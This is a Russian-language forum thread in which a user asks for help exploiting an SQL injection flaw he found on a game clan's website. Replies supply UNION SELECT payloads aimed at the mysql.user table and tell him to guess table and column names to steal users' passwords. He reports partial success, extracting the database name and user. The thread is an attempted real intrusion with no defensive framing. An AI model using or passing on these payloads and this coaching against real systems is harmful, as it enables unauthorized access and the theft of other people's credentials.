пРИВЕТ всем.
Тут на сайте одного из кланов БК нашел вот что.
Если сделать запрос на статью:
newsid='
то вылазит:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72

sql-injection можно провести с помошью этого?

Хм а что ты нас то спрашиваешь. Ты сам не пробовал. Попробуй провести такой запрос
+union+select+1,2,user,password,5,6+from+mysql.use r/* Если скажет acces denied то 100% скуль. Вот тебе статьи если что по скулям.
http://www.forum.antichat.ru/thread19684.html
http://www.forum.antichat.ru/thread19605.html

спасибо. проверю

ура!!!
сделал запрос:
-1+union+select+1,2,3,4,5/*
прокатило все.
а как дальше строить запрос. помогите пожалуйста.
да вот вытянул название бд и юзера.
но не получаетсяс помошью этого:
-1+union+select+1,2,user,password,5+from+mysql.us er/*
вытянусть пасс

мне кто нить поможет в конце концов?

Нет прав на доступ к базе mysql .

подбирай названия таблиц и столбцов, чтобы спереть пассы юзверей.

Об sql можешь почитать тут ->->-> http://xzone.org.ru/index.php?name=Pages&op=page&pid=56

-1+union+select+1,2,user,password,5+from+mysql.user/*
Пропиши и дай лог что выдала страница.

ничего не выдала.
точнее то что и при простом ошибочном запросе.
даже столбцов нету
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/xxx/public_html/modules/comments/comments.php on line 72